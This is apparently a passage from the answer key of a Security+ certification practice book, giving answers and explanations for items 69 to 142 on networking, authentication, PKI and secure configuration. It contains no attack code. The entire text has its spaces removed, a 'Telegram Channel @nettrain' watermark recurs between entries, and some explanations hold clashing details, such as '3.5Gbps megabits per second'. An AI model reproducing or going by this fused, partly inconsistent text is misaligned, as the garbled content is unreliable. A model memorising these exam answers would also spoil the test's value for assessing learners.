69. B. Fuzzingisatechniquewherebythetesterintentionallyentersincorrectvaluesintoinputfieldstoseehowtheapplicationwillhandleit.Staticcodeanalysistoolssimplyscanthecodeforknownissues,baseliningistheprocessofestablishingsecuritystandards,andversioncontrolsimplytrackschangesinthecode—itdoesnottestthecode.
70. B. Althoughhardwaresecuritymodules(HSMs)providemanycryptographicfunctions,theyarenotusedforbootattestation.ATPM,orTrustedPlatformModule,isusedforsecurebootattestation.
71. A. CynthiashoulddeployRadioFrequencyIdentifier(RFID)cards,which
Telegram Channel @nettrain
canbereadusingcontactlessreaders.RFIDtechnologyiscommonandrelativelyinexpensive,butwithoutadditionalauthentication,possessionofacardistheonlymeansofdeterminingifsomeoneisauthorizedtoaccessabuildingorroom.Wi-Fiisnotusedforcontactlesscardsbecauseofitspowerconsumptionandoverhead.Magstripesrequireareaderratherthanbeingcontactless,andHOTPisaformofone-timepasswordsystem.
72. B. Ratelimitingandback-offalgorithmsbothlimithowquicklyqueriescanbeperformed.Requiringauthenticationwouldrestrictwhocouldaccessthedirectory.RequiringLDAPS(LightweightDirectoryAccessProtocoloverSSL)doesnotpreventenumeration,butitdoesprovidesecurityforthequeriedinformationasittransitsnetworks.
73. D. ASAN,orSubjectAlternateName,certificateallowsmultiplehostnamestobeprotectedbythesamecertificate.ItisnotatypeofcertificateforSANstoragesystems.ASANcertificatecouldbeself-signed,butthatdoesnotmakeitaSANcertificate,andofcoursethesecurityorganizationSANSisnotacertificateauthority.
74. A. Thecorrectansweristoassigndigitalcertificatestotheauthorizedusersandtousethesetoauthenticatethemwhenloggingin.Thisisaneffectivewaytoensurethatonlyauthorizeduserscanaccesstheapplication.Althoughtheremainingoptionsareallgoodsecuritymeasures,theyarenotthebestwaytoauthenticatetheclientandpreventunauthorizedaccesstotheapplication.
75. D. Thecorrectansweristofirsttestpatches.Itisalwayspossiblethatapatchmightcauseissuesforoneormorecurrentapplications.Thisisparticularlyaconcernwithapplicationsthathavealotofinteractionwiththehostoperatingsystem.Anoperatingsystempatchcanpreventtheapplicationfromexecutingproperly.Butassoonasthepatchesaretested,aphasedrollouttothecompanyshouldbegin.Automaticpatchingisnotrecommendedincorporateenvironmentsbecauseapatchcouldpossiblyinterferewithoneormoreapplications—thus,amanagedpatchdeploymentprocessisimplementedthatrequiresmoreadministrativetimebutavoidsoutagesduetopatcheswithissuesinanorganization’sspecificenvironment.Havingindividualuserspatchtheirownmachinesisabadideaandwillleadtoinconsistentpatchingandtheapplicationofuntestedpatches.DelegatingpatchmanagementtomanagersinsteadofITstaffcanleadtoproblems,too,duetovaryingskillsetsandpractices.
Telegram Channel @nettrain
76. B. Althoughwirelessanalyzersprovidein-depthinformationaboutServiceSetIdentifiers(SSIDs),signalstrength,andprotocolversions,theRemoteAuthenticationDial-InUserService(RADIUS)orKerberosversionnumberforthebackendauthenticationserversisnotsomethingthattheywilltypicallybeabletoprovide.
77. B. Thecorrectansweristoturnoffanyremoteaccesstosuchdevicesthatisnotabsolutelyneeded.ManyperipheraldevicescomewithSSH(SecureShell),Telnet,orsimilarservices.Ifyouarenotusingthem,turnthemoff.Manyperipheralsdon’thavediskstoencrypt,makingfull-diskencryption(FDE)alessusefulchoice.Fuzztestingisusedtotestcode,notdevices,andperipheralsareunlikelytosupportdigitalcertificatesinmostcases.
78. C. Manualcodereviewisatypeofstaticcodereviewwherereviewersreadthroughsourcecodetoattempttofindflawsinthecode.Dynamiccodereviewrequiresrunningthecode,Fagantestingisaformalcodereviewprocessthatworksthroughmultiplephasesofthedevelopmentprocess,andfuzzingisaformofdynamicinspectionthatsendsunexpectedvaluestoarunningprogram.
79. C. SamanthashouldplaceherpublicSSHkeyinthe.sshdirectoryinherhomedirectoryontheremoteserver.Privatekeysshouldneverbeoutsideofyourcontrol,andunlikemanyLinuxconfigurations,SSHkeysarenotkeptinthe/etc/directory.
80. C. Thecorrectansweristousestaticcodeanalysis.Memoryleaksareusuallycausedbyfailuretodeallocatememorythathasbeenallocated.Astaticcodeanalyzercanchecktoseeifallmemoryallocationcommands(malloc,alloc,etc.)haveamatchingdeallocationcommand.Fuzzinginvolvesenteringdatathatisoutsideexpectedvaluestoseehowtheapplicationhandlesit.Stresstestinginvolvestestinghowasystemhandlesextremeworkloads.Normalizationisatechniquefordeduplicatingadatabase.
81. D. LoadbalancersprovideavirtualIP,orVIP.TrafficsenttotheVIPisdirectedtoserversinthepoolbasedontheload-balancingschemethatthatpoolisusing—oftenaround-robinscheme,butotherversionsthatincludepriorityorderandcapacitytrackingorratingsarealsocommon.Theloadbalancer’sIPaddressisnormallyusedtoadministerthesystem,andindividualIPaddressesfortheclusteredhostsareshieldedbytheloadbalancertopreventtrafficfromconsistentlygoingtothosehosts,thus
Telegram Channel @nettrain
creatingafailureorloadpoint.
82. D. Inawell-implementedpasswordhashingscheme,uniquerandombitscalledsaltsareaddedtoeachpasswordbeforetheyarehashed.Thismakesgeneratingarainbowtableorotherwisebrute-forcinghashesforallofthepasswordsstoredinadatabaseextremelytime-consuming.Theremainingoptionsweremadeupandarenotactualsecurityterms.
83. A. ThecorrectansweristouseSecureShell(SSH).Thisprotocolisencrypted.SSHalsoauthenticatestheuserwithpublickeycryptography.Telnetisinsecureanddoesnotencryptdata.RSH,orRemoteShell,sendsatleastsomedataunencryptedandisalsoinsecure.SNMP,orSimpleNetworkManagementProtocol,isusedtomanageanetworkandisnotusedforremotecommunications.
84. A. Resource-basedpoliciesareattachedtoresourcesanddeterminewhohasaccesstoaresource,suchasagroupofsysadminsordevelopers,andwhatactionstheycanperformontheresource.Cloudserviceshavedifferenttermsformonitoringtheirresourceusage;thesetermsmayvaryfromservicetoservice.
85. A. Networkedsensorappliancesaredeployedinmanydatacenterstogatherinformationabouttemperatureandhumidityaspartoftheenvironmentalmonitoringsystem.Firedetectionandsuppressionsystemsarenottypicallymountedinracks,andpowerqualityandreliabilityismeasuredbyPDUs(powerdistributionunits),UPS(uninterruptablepowersupplies),andotherpowerinfrastructure.
86. C. SecureIMAP’sdefaultportisTCP993.LaurelcaneasilyguessthatthesystemoffersaTLS-protectedversionofIMAPforclientstousetoretrieveemailmessages.ThedefaultportforsecurePOPis995,andforsecureSMTPthedefaultportis587.S/MIMEdoesnothaveaspecificport,asitisusedtoencryptthecontentofemailmessages.
87. C. Adhocwirelessnetworksoperateinapoint-to-pointtopology.Infrastructuremodeaccesspointsworkinapoint-to-multipointtopology.Starandbusmodelsareusedinwirednetworks.
88. C. Onlyusingcodethatisdigitallysignedverifiesthecreatorofthesoftware.Forexample,ifaprinter/multifunctiondevice(MFD)driverisdigitallysigned,thisgivesyouconfidencethatitreallyisaprinterdriverfromthevendoritpurportstobefrom,andnotmalwaremasqueradingasaprinterdriver.Signedsoftwaregivesyouahighdegreeofconfidencethatit
Telegram Channel @nettrain
isnotmalwarebutdoesnotprovideaguarantee.Forexample,theinfamousFlameviruswassignedwithacompromisedMicrosoftdigitalcertificate.Digitalsigningofsoftwarehasnoeffectonpatchmanagement.Finally,digitallysignedsoftwarewillnotexecutefasterorslowerthanunsignedsoftware.
89. D. TheSecurity+examreferstopasswordmanagersaspasswordvaults.Samanthashouldrecommendapasswordvaultthatwillallowheruserstogenerate,store,andusemanypasswordssecurely.Noneoftheotheroptionsaregoodadviceforpassworduseandstorage.
90. A. PortsecurityfiltersbyMACaddress,allowingwhitelistedMACaddressestoconnecttotheportandblockingblacklistedMACaddresses.Portsecuritycanbestatic,usingapredeterminedlistordynamicallyallowingaspecificnumberofaddressestoconnect,oritcanberuninacombinationmodeofbothstaticanddynamicmodes.
91. C. Authenticationheaders(AHs)providecompletepacketintegrity,authenticatingthepacketandtheheader.Authenticationheadersdonotprovideanyencryptionatall,andauthenticationheadersauthenticatetheentirepacket,notjusttheheader.
92. B. AsplithorizonDNSimplementationdeploysdistinctDNSserversfortwoormoreenvironments,ensuringthatthoseenvironmentsreceiveDNSinformationappropriatetotheDNSviewthattheirclientsshouldreceive.DomainNameSystemSecurityExtensions(DNSSEC)isaDNSsecuritysetofspecificationstohelpprotectDNSdata.DMZDNSandDNSproxyingarenotdesignpatternsorcommontermsusedinthesecurityornetworkingfield.
93. A. Networktapscopyalltraffictoanotherdestination,allowingtrafficvisibilitywithoutadeviceinline.Theyarecompletelypassivemethodsofgettingnetworktraffictoacentrallocation.Portmirroringwouldgetallthetraffictothenetwork-basedintrusionpreventionsystem(NIPS)butisnotcompletelypassive.Itrequirestheuseofresourcesonswitchestorouteacopyofthetraffic.Incorrectswitchconfigurationscancauselooping.Configuringloopdetectioncanpreventloopedports.PuttinganetworkIPSoneverysegmentcanbeveryexpensiveandrequireextensiveconfigurationwork.OptionDisincorrect.Thisisnottheassignment.SettingupaNIPSoneachsegmentwouldalsodramaticallyincreaseadministrativeefforts.
Telegram Channel @nettrain
94. C. FederatingRADIUSallowsorganizationstopermitusersfromotherpartnerorganizationstoauthenticateagainsttheirhomesystems,andthenbeallowedontothelocalorganization’snetwork.Anexampleofthisistheeduroamfederationusedbyhighereducationinstitutionstopermitstudents,faculty,andstafftousecollegenetworksanywheretheygowhereeduroamisinplace.Presharedkeysaredeterminedbythelocationorganizationandwouldnotpermitenterprisecredentialsfromotherorganizationstobeused.OpenIDisusedforwebauthentication,and802.11qisatrunkingprotocol.
95. C. Context-awareauthenticationcantakeintoaccountinformationlikegeolocationtoensurethatthedevicescanonlybeloggedintowhentheyareinsideofthefacility’sboundaries.Thatmeansthedeviceswillonlybeusefulon-siteandcanhelpprotectthedataandapplicationsonthedevices.NeitherPINsnorbiometricscandothis,andcontent-awareauthenticationwasmadeupforthisquestion.
96. B. ATPM,orTrustedPlatformModule,isasecurecryptoprocessorusedtoprovideahardwarerootoftrustforsystems.Theyenablesecurebootandbootattestationcapabilities,andincludearandomnumbergenerator,theabilitytogeneratecryptographickeysforspecificuses,andtheabilitytobindandsealdatausedforprocessestheTPMsupports.
97. B. Internetkeyexchange(IKE)isusedtosetupsecurityassociations(SAs)oneachendofthetunnel.Thesecurityassociationshaveallthesettings(i.e.,cryptographicalgorithms,hashes)forthetunnel.IKEisnotdirectlyinvolvedinencryptingorauthenticating.IKEitselfdoesnotestablishthetunnel—itestablishestheSAs.
98. A. Arootcertificateisthebasecertificatethatsignsanentirecertificatechain.AcommonsecuritypracticetoprotecttheseincrediblyimportantcertificatesistokeeptherootcertificateandCAofflinetopreventthepotentialofcompromiseorexposure.Machine/computer,user,andemailcertificatesaredeployedandusedthroughoutorganizationsand,sincetheyareusedonafrequentbasis,aren’tlikelybetokeptoffline.
99. A. TheNIPSisnotseeingthetrafficonthatnetworksegment.Byimplementingportmirroring,thetrafficfromthatsegmentcanbecopiedtothesegmentwheretheNIPSisinstalled.InstallinganetworkIPSonthesegmentwouldrequireadditionalresources.Thiswouldworkbutisnotthemostefficientapproach.NothinginthisscenariosuggeststhattheNIPSisinadequate.Itjustisnotseeingallthetraffic.Finally,isolatingthesegment
Telegram Channel @nettrain
toitsownVLANwouldisolatethatnetworksegmentbutwouldstillnotallowtheNIPStoanalyzethetrafficfromthatsegment.
100. B. Tokenizationisusedtoprotectdatabysubstitutingtokensforsensitivedatawithoutchangingthelengthordatatype.Thisallowsdatabasestohandlethedatainthesamewayasitwaspriortotokenization,ensuringthatexistingsoftwarewillnotrunintoproblemsduetothedatabeingchanged.Encryptionprovidessimilarprotectionbutwillnormallychangeeitherthedatalength,thedatatype,orboth.Hashingisone-way,whichmeansitisnotagoodfitformanyscenarioswheretokenizationorencryptionwillprotectdata.Rotationisnotasecuritymethodusedforthistypeofwork.
101. A. Elenoracoulddeployalogaggregatorateachlocationtocollectandaggregatethelogs.Logcollectionandaggregationsystemscanthenfilterunneededlogentries,compressthelogs,andforwarddesiredlogstoacentralsecuritysystemlikeasecurityinformationandeventmanagement(SIEM)orotherloganalysiscollectionandanalysistool.Ahoneypotactslikeadesirabletarget,luringattackersintocapturedataabouttheirattacks.Abastionhostisdesignedtoresistattacksandnormallyprovidesasingleservicetothenetworkonwhichitresides.
102. D. Fuzzingisanautomated,dynamicsoftwaretestingtechniquethatsendsunexpectedandofteninvaliddatatoaprogramtotesthowitresponds.Thesoftwareismonitoredtoseehowitrespondstotheinput,providingadditionalassurancethattheprogramhaspropererrorhandlingandinputvalidationbuiltin.Timeboxingisanagileprojectmanagementtechnique;bufferoverflowsmayoccuraspartoffuzzing,butarenottheonlytechniqueusedordescribedhere;andinputvalidationcanhelpstopfuzzingfromcausingproblemsforanapplicationbypreventingout-of-boundsorunwanteddatafrombeingaccepted.
103. B. DynamicHostConfigurationProtocol(DHCP)snoopingcanbesetuponswitchestomonitorforandstoprogueDHCPtrafficfromunknownservers.DisablingDHCPsnoopingwouldremovethisfeature.Intrusiondetectionsystems(IDSs)cannotstoptraffic,andblockingDHCPtrafficwouldpreventsystemsfromacquiringdynamicIPaddresses.
104. B. Endpointdetectionandresponse(EDR)focusesonidentifyinganomaliesandissues,butitisnotdesignedtobeamalwareanalysistool.Instead,theabilitytosearchandexploredata,identifysuspiciousactivities,
Telegram Channel @nettrain
andcoordinateresponsesiswhatmakesupanEDRtool.
105. A. Awebproxycanbeusedtoblockcertainwebsites.Itiscommonpracticefornetworkadministratorstoblockeitherindividualsitesorgeneralclassesofsites(likejob-huntingsites).Networkaddresstranslation(NAT)isusedtotranslatetheprivateIPaddressesofinternalcomputerstopublicIPaddresses.ApacketfilterfirewallcanblocktrafficonagivenportorIPaddressorusingaparticularprotocol,butgenerallytheyarenotabletoblockspecificwebsites.Network-basedintrusionpreventionsystems(NIPSs)identifyandblockattacks;theycannotpreventusersfromvisitingspecificwebsites.
106. C. Secretsmanagementservicesprovidetheabilitytostoresensitivedatalikeapplicationprogramminginterface(API)keys,passwords,andcertificates.Theyalsoprovidetheabilitytomanage,retrieve,andauditthosesecrets.Apublickeyinfrastructure(PKI)wouldfocusoncertificatesandencryptionkeys,withoutpasswordsorAPIkeys.ATrustedPlatformModule(TPM)isassociatedwithhardware,andahushservicewasmadeupforthisquestion.
107. A. SAML,theSecurityAssertionMarkupLanguage,isusedbymanyidentityproviderstoexchangeauthorizationandauthenticationdatawithserviceproviders.KerberosandLDAP(LightweightDirectoryAccessProtocol)areusedinsidemanyorganizations,butFredwillfindmoresuccesswithSAMLforpopularwebservices.NewTechnologyLANManager(NTLM)remainsinuseforWindowssystems,butKerberosismorecommonlyusedformodernWindowsdomainsandwouldnotbeusedinthescenariodescribedhere.
108. D. Loadbalancingtheclusterwillpreventanysingleserverfrombeingoverloaded.Andifagivenserverisoffline,otherserverscantakeonitsworkload.OptionAisincorrect.AVPNconcentrator,asthenamesuggests,isusedtoinitiatevirtualprivatenetworks(VPNs).OptionBisincorrect.Aggregateswitchingcanshuntmorebandwidthtotheserversbutwon’tmitigatethethreatofoneormoreserversbeingoffline.OptionCisincorrect.SSLacceleratorsareamethodofoffloadingprocessor-intensivepublic-keyencryptionforTransportLayerSecurity(TLS)andSecureSocketsLayer(SSL)toahardwareaccelerator.
109. C. Thethreechannelsthatdonotoverlapare1,6,and11.Therestofthechannelswilloverlap.Inanidealinstallation,thesethreechannelscanbe
Telegram Channel @nettrain
usedtomaximizethroughputandminimizeinterference.
110. B. ThecorrectansweristoencryptallthewebtraffictothisapplicationusingTransportLayerSecurity(TLS).Thisisoneofthemostfundamentalsecuritystepstotakewithanywebsite.Awebapplicationfirewall(WAF)isprobablyagoodidea,butitisnotthemostimportantthingforRyantoimplement.Whileanetwork-basedintrusionpreventionsystem(IPS)orintrusiondetectionsystem(IDS)maybeagoodidea,thoseshouldbeconsideredafterTLSisconfigured.
111. B. Infrared(IR)istheonlyline-of-sightmethodonthelist.AlthoughNear-FieldCommunication(NFC)andBluetoothhavearelativelyshortrange,theycanstilloperatethroughmaterialsplacedbetweenthemandthereceiver,andWi-Ficandosoatanevenlongerrange.
112. A. ThecorrectansweristhatKerberosusesvarioustickets,eachwithatimelimit.Theserviceticketsaretypicallyonlygoodfor5minutesorless.ThismeansthatiftheNetworkTimeProtocol(NTP)isfailing,validticketsmayappeartobeexpired.RADIUS,CHAP,andLDAPwillnothaveanysignificanteffectduetoNTPfailure.
113. C. ThecorrectansweristhatChallengeHandshakeAuthenticationProtocol(CHAP)periodicallyhastheclientreauthenticate.Thisistransparenttotheuserbutisdonespecificallytopreventsessionhijacking.PasswordAuthenticationProtocol(PAP)isactuallyquiteoldanddoesnotreauthenticate.Infact,itevensendsthepasswordincleartext,soitshouldnotbeusedanylonger.SPAP(ShivaPasswordAuthenticationProtocol)addspasswordencryptiontoPAPbutdoesnotreauthenticate.OAuthisusedinwebauthenticationanddoesnotreauthenticate.
114. B. Asoftwarefirewallisbestsuitedtodeploymentstoindividualmachines,particularlywhenendpointsystemsarebeingprotected.Hardwarefirewallsaretypicallydeployedtoprotectnetworksegmentsorgroupsofsystems,andresultinadditionalexpenseandmanagement.Virtualandcloudfirewallsaremostoftendeployedindatacenterswherevirtualorcloudenvironmentsareinuse,althoughavirtualfirewallcouldberunonanendpoint.
115. D. Aserviceaccountisthemostappropriateinthisscenario.Serviceaccountsaregiventheleastprivilegestheserviceneedsandareusedbytheservice,withouttheneedforahumanuser.Althoughyoucouldassignauseraccount,itisnotasgoodasolutionasusingaserviceaccount.Aguest
Telegram Channel @nettrain
accountwouldneverbeagoodideaforaservice.Guestaccountsaretypicallytoolimited.It’scommonpracticetodisabledefaultaccountssuchastheGuestaccount.Anadminaccountwouldgivetoomanyprivilegestotheserviceandviolatetheprincipleofleastprivileges.
116. A. OftheseversionsofExtensibleAuthenticationProtocol(EAP),onlyLightweightExtensibleAuthenticationProtocol(LEAP)doesnotsupportTLS.EAPTunneledTransportLayerSecurity(EAP-TTLS)actuallyextendsTLS,butsupportstheunderlyingprotocol.ProtectedExtensibleAuthenticationProtocol(PEAP)encapsulatesEAPwithinanencryptedTLStunnel.
117. C. JailbreakingallowsuserstoaddsoftwaretoaniPhonethatisn’tnormallyallowed,includingthird-partyapplications,changingsystemsettings,themes,ordefaultapplications.Third-partyapplicationstoresaren’tavailablebydefault,andside-loadingcanbeaccomplishediniOSbutdoesn’tdowhatMannywantsitto,andofcourseinstallingAndroidwon’tletMannychangeiOSsettings.IfMannydoesjailbreakhisphone,hisorganizationmaynoticeifthey’reusingamobiledevicemanagement(MDM)orunifiedendpointmanagement(UEM)applicationtotrackthestatusofthedevice.
118. C. ManysmartcardsimplementRadioFrequencyIdentification(RFID)toallowthemtobeusedforentryaccessandotherpurposes.Wi-Fi,Infrared,andBluetoothgenerallyrequirepoweredcircuitstointeractwithsystems,makingthemapoorfitforasmartcardthatdoesnottypicallyhaveabatteryorotherpowersource.
119. A. Mandatoryaccesscontrol(MAC)isthecorrectsolution.Itwillnotallowlowerprivilegeduserstoevenseethedataatahigherprivilegelevel.Discretionaryaccesscontrol(DAC)haseachdataownerconfigurehisorherownsecurity.Role-basedaccesscontrol(RBAC)couldbeconfiguredtomeettheneeds,butit’snotthebestsolutionfortheserequirements.SecurityAssertionMarkupLanguage(SAML)isnotanaccesscontrolmodel.
120. B. Anagent-based,preadmissionsystemwillprovidegreaterinsightintotheconfigurationofthesystemusingtheagent,andusingapreadmissionmodelwillallowthesystemconfigurationtobetestedbeforethesystemisallowedtoconnecttothenetwork.AgentlessNACusesscanningand/ornetworkinventorytechniquesandwilltypicallynothaveasdeepalevelof
Telegram Channel @nettrain
insightintotheconfigurationandsoftwareversionsrunningonasystem.Postadmissionsystemsmakeenforcementdecisionsbasedonwhatusersdoaftertheygainadmissiontoanetwork,ratherthanpriortogainingadmission,allowingyoutoquicklyruleouttwooftheseoptions.
121. C. Claire’sbestoptionistodeployadetectionandfixviaherwebapplicationfirewall(WAF)thatwilldetecttheSQLinjectionattemptandpreventit.Anintrusiondetectionsystem(IDS)onlydetectsattacksandcannotstopthem.Manuallyupdatingtheapplicationcodeafterreverse-engineeringitwilltaketime,andshemaynotevenhavethesourcecodeortheabilitytomodifyit.Finally,vendorpatchesforzerodaystypicallytakesometimetocomeouteveninthebestofcircumstances,meaningthatClairecouldbewaitingonapatchforquiteawhileifthatistheoptionshechooses.
122. C. CYOD,orchooseyourowndevice,allowsuserstochooseadevicethatiscorporateownedandpaidfor.Choicesmaybelimitedtosetofdevices,orusersmaybeallowedtochooseessentiallyanydevicedependingontheorganization’sdeploymentdecisions.BYODallowsuserstobringtheirowndevice,whereasCOPE,orcorporate-owned,personallyenabled,providesdevicestousersthattheycanthenuseforpersonaluse.VDIusesavirtualdesktopinfrastructureasanaccesslayerforanysecuritymodelwherespecializedneedsorsecurityrequirementsmayrequireaccesstoremotedesktoporapplicationservices.
123. B. Thekeyelementhereisthatthecertificateauthorities(CA)areoperatinginamesh,meaningnoCAistherootCAandthateachmusttrusttheothers.Toaccomplishthis,DerekfirstneedstoissuecertificatesfromDtoeachoftheotherCasandthenhavetheothersissueDacertificate.Privatekeysshouldneverbeexchanged,andofcourseifheonlyhastheothersystemsissueDcertificates,theywon’trecognizehisserver.
124. C. IfClaireisusingSimpleNetworkManagementProtocol(SNMP)tomanageandmonitorhernetworkdevices,sheshouldmakesuresheisusingSNMPv3andthatitisproperlyconfigured.SNMPv3canprovideinformationaboutthestatusandconfigurationofhernetworkdevices.RemoteAuthenticationDial-InUserService(RADIUS)mightbeusedtoauthenticatetothenetwork,butTransportLayerSecurity(TLS)andSSHFileTransferProtocol(SFTP)arenotspecificallyusedforthepurposesdescribed.
Telegram Channel @nettrain
125. D. Fuzzerssendunexpectedandoutofrangedatatoapplicationstoseehowtheywillrespond.Inthiscase,Benisusingafuzzer.Webproxiesareoftenusedtodoapplicationtestingbecausetheyallowdatatobechangedbetweenthebrowserandtheapplication.SQLinjectionmaybedoneviaawebproxy,butadedicatedSQLinjectionproxyisnotatypeoftoolbyitself.Finally,astaticcodereviewtoolisusedtoreviewsourcecodeandmaybeassimpleasaNotepadapplicationorascomplexasafullyintegrateddevelopmentenvironment(IDE).
126. B. ContainerizationwillallowEric’scompany’stoolsanddatatoberuninsideofanapplication-basedcontainer,isolatingthedataandprogramsfromtheself-controlledbringyourowndevice(BYOD)devices.Storagesegmentationcanbehelpful,buttheoperatingsystemitselfaswellastheapplicationswouldremainaconcern.Ericshouldrecommendfull-deviceencryption(FDE)asasecuritybestpractice,butencryptingthecontainerandthedataitcontainscanprovideareasonablesecuritylayerevenifthedeviceitselfisnotfullyencrypted.Remotewipeishelpfulifdevicesarelostorstolen,buttheendusermaynotbeokaywithhavingtheentiredevicewiped,andtherearewaystoworkaroundremotewipes,includingblockingcellularandWi-Fisignals.
127. B. Kerberosdoesnotsendtheuserspasswordacrossthenetwork.Whentheuser’snameissenttotheauthenticationservice,theserviceretrievesthehashoftheuser’spasswordfromthedatabase,andthenusesthatasakeytoencryptdatatobesentbacktotheuser.Theuser’smachinetakesthepasswordthattheuserentered,hashesit,andthenusesthatasakeytodecryptwhatwassentbackbytheserver.ChallengeHandshakeAuthenticationProtocol(CHAP)sendstheuser’spasswordinanencryptedform.RBACisanaccesscontrolmodel,notanauthenticationprotocol.TypeIIauthenticationissomethingyouhave,suchasakeyorcard.
128. A. EV,orextendedvalidation,certificatesprovethattheX.509certificatehasbeenissuedtothecorrectlegalentity.Inaddition,onlyspecificcertificateauthorities(Cas)canissueEVcertificates.Domain-validatedcertificatesrequireproofthatyouhavecontrolofthedomain,suchassettingtheDNSTXTrecordorrespondingtoanemailsenttoacontactinthedomain’sWhoisrecord.Anorganizationalvalidationcertificaterequireseitherdomainvalidationandadditionalproofthattheorganizationisalegalentity.OCSPcertificatesweremadeupforthisquestion.
129. D. Wi-Fi5networkscanprovidetheoreticalthroughputupto3.5Gbps
Telegram Channel @nettrain
megabitspersecond,althoughnewerstandardslikeWi-Fi6continuetopushthishigher.ThenextfastestwirelessstandardlistedisLTEcellularwiththeoreticalthroughputsaround50megabitspersecond.Whenbandwidthisimportant,Wi-Fiwilltendtowin,although5GcellularnetworksunderidealconditionsmayrivalWi-Fi.
130. C. Thecostofapplicationsandthequalityofthesecurityimplementationcanvarybasedonthevendorandproduct,butcloud-nativesecuritysolutionswillgenerallyhavebetteranddeeperintegrationintothecloudplatformthanthird-partysolutionswill.Vendordiversityindesignsmaystilldriveotherchoices,butthoseareconsciousdesigndecisions.
131. D. Jumpboxesareacommonsolutionforprovidingaccesstoanetworkwithadifferentsecurityprofile.Inthiscase,Edcandeployajumpboxinthedemilitarizedzone(DMZ)toallowuserswithinhisadministrativezonetoperformtaskswithoutdirectlyconnectingtotheworld-exposedDMZ.Thishelpskeepadministrativesystemssecureandallowshimtofocusonthesecurityofthejumpbox,whilealsomakingiteasiertomonitorandmaintain.Anintrusionpreventionsystem(IPS)isusedtomonitorandblockunwantedtraffic,butisn’tusedforremoteaccess.ANATgatewayperformsnetworkaddresstranslationandisplacedbetweennetworksbutisnottypicallyusedtoprovidesecureconnectionsbetweennetworks.Instead,itservestoreducethenumberofpublicIPaddressesusedandtoprovidesomelimitedsecurityforsystemsbehindit.Routersareusedtoconnecttonetworksbutarenotusedtoprovidesecureaccessasdescribedinthequestion.
132. C. OAuth(OpenAuthorization)isanopenstandardfortoken-basedauthenticationandauthorizationontheInternetandallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.Kerberosisanetworkauthenticationprotocolandnotusedforcross-domain/serviceauthentication.SecurityAssertionMarkupLanguage(SAML)isanXML-based,open-standarddataformatforexchangingauthenticationandauthorizationdatabetweenparties.OpenIDisanauthenticationserviceoftenprovidedbyathirdparty,anditcanbeusedtosignintoanywebsitethatacceptsOpenID.Itwouldbepossibleforthistowork,butonlywithwebsitesthatsupportOpenID,soitisnotasgoodasolutionasOAuth.
133. A. Sessionpersistencemakessurethatallofaclient’strafficforatransactionorsessiongoestothesameserverorservice.Theremaining
Telegram Channel @nettrain
optionsdonotproperlydescribehowsessionpersistenceworks.
134. B. Datalossprevention(DLP)toolsallowsensitivedatatobetaggedandmonitoredsothatifauserattemptstosendit,theywillbenotified,administratorswillbeinformed,andifnecessary,thedatacanbeprotectedusingencryptionorotherprotectionmethodsbeforeitissent.Full-diskencryption(FDE)wouldprotectdataatrest,andS/MIMEandPOP3SwouldprotectmailbeingretrievedfromaserverbutwouldnotpreventtheSSNsfrombeingsent.
135. B. Whileinfrastructureasaservice(IaaS)vendorsoftenprovidestrongsupportforhighavailability,includingreplicationtomultiplegeographiczonesorregions,aswellashighlyreliableandsecurestorage,theydonotallowdirectaccesstotheunderlyinghardwareinmostinstances.IfJenniferrequiresdirectaccesstohardware,shewillneedtodeploytoadatacenterwhereshecanretainaccesstothephysicalservers.
136. B. Out-of-band(OOB)managementusesseparatemanagementinterfaces,asshowninthefigure,oradifferentconnectivitymethodthanthenormalconnectiontoprovideasecuremeansofmanagingsystems.ADMZ,ordemilitarizedzone,isasecurityzonethatistypicallyexposedtotheworldandisthuslesstrustedandmoreexposed.In-bandmanagementusescommonprotocolslikeSecureShell(SSH)orHTTPStomanagedevicesviatheirnormalinterfacesornetworkconnections.TransportLayerSecurity(TLS)isasecurityprotocol,notamanagementinterface.
137. A. Keyescrowprovidesencryptionkeystoathirdpartysothattheycanbereleasedtoanappropriatepartyifcertainconditionsaremet.Althoughthismeansthatthekeysareoutofthecontroloftheowningorresponsibleparty,inmanycasestheneedtohavearecoverableoraccessiblewaytogettothekeysoverridestherequirementtokeepthekeysinasingleindividualororganization’shands.Theremainingoptionsweremadeup,butyoumayencountertheterm“keyrecovery,”whichisaprocesswherelawenforcementorotherpartiesmayrecoverkeyswhenneededusingaprocessthatprovidesthemwithanaccesskeyordecryptionkeythatmaynotbethesamekeyasthekeyusedbytheoriginalencryptionuser.
138. D. Bootattestationrequiressystemstotrackandmeasurethebootprocessandtothenattesttoasystemthattheprocesswassecure.Secureboot,whichisarelatedconcept,allowsonlytrustedsoftwaretoberunusingpreviouslyhashedvaluestoensuretheprocessissecure.BOOTPandBIOS
Telegram Channel @nettrain
arenotinvolvedinthisprocess,instead,UnifiedExtensibleFirmwareInterface(UEFI)firmwaresupportsbothsecurebootandbootattestation.
139. A. ThecorrectansweristhatOpenIDisanauthenticationserviceoftendonebyathirdparty,anditcanbeusedtosignintoanywebsitethatacceptsOpenID.Kerberosisanetworkauthenticationprotocolforusewithinadomain.NewTechnologyLANManager(NTLM)isanolderWindowsauthenticationprotocol.Shibbolethisasinglesign-onsystem,butitworkswithfederatedsystems.
140. C. Disablingremoteregistryaccessforsystemsthatdonotrequireitcanpreventremoteregistrymodificationandreads.Thisisarecommendedbestpracticewheneverpossible,butsomesystemsmayrequireremoteregistryaccessformanagementorotherreasons.TheWindowsregistryisnotindependentlypatched,theregistryneedstobereadableandwritabletohaveafunctionalWindowssystem,andthereisnomodethatencryptsuserkeys.
141. D. Maximizingcoverageoverlapwouldcausegreatercontentionbetweenaccesspoints.Instead,installationsshouldminimizeoverlapwithoutleavingdeadspotsinimportantareas.Performingasitesurvey,controllingpowerlevelsandadjustingthemtominimizecontention,anddesigningaroundtheconstructionmaterialsofabuildingareallimportantpartsofdesigningthephysicallayoutandplacementofWAPs.Fortunately,modernenterprisewirelessnetworkshaveadvancedintelligentfeaturesthathelpdomanyofthesethingssomewhatautomatically.
142. B. DisablingtheaccountisthebestoptiontomeetMark’sneeds.Disablinganaccountwillleaveitinadifferentstatethananactiveaccountoronewithachangedpassword,whichshouldbenotedbysupportstaffifGabbycalledandaskedtochangeherpassword.Thatmeansthatthereislessriskofadisgruntledemployeeoranattackersuccessfullygainingaccesstotheaccount.Atthesametime,disablingislessdestructivethandeletingtheaccount,makingitfastertorestoreandpreservingherfilesandothermaterials.Mostorganizationswillchoosetohaveatimelimitforhowlonganaccountcanbeinadisabledstatewithoutreviewormovingtoanotheraccountstatetohelpensurethatdisabledaccountsdonotbuildupovertime.
